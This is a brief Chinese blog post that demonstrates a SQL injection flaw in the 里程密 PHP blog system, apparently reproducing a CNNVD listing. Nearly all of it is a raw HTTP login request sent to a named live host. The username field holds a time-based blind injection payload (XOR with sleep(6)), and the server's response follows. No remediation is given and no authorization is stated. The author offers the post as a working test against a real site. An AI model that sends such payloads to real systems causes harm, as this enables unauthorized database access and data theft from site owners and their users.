里程密PHP博客系统存在SQL注入漏洞

作者:小俊 分类: WEB漏洞大全 发布于:2020-11-28 22:58 ė252次浏览 60条评论

看到国家的CNNVD网站有一个标题《里程密PHP博客系统存在SQL注入漏洞


来吧我们来测试一下!


POST /index.php?a=login&c=user&m=home HTTP/1.1 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: https://blog.fudong.top/ Cookie: PHPSESSID=jhide8evqsav9oh6u87hea9co5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Content-Length: 81 Host: blog.fudong.top User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Connection: Keep-alive password=g00dPa%24%24w0rD&username=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z```


回显


HTTP/1.1 200 OK Server: JSP3/2.0.14 Date: Tue, 10 Nov 2020 08:24:27 GMT Content-Type: application/json; charset=utf-8 Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Accept-Ranges: bytes Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Timing-Allow-Origin: * Ohc-File-Size: -1 Content-Length: 61 {"info":"\u767b\u9646\u5931\u8d25\uff01","status":0,"url":""}


就这多、到这就够了!


用工具扫描的报告!

里程密PHP.zip


本文出自 小俊博客,转载时请注明出处及相应链接。

0

发表评论

电子邮件地址不会被公开。必填项已用*标注


Ɣ回顶部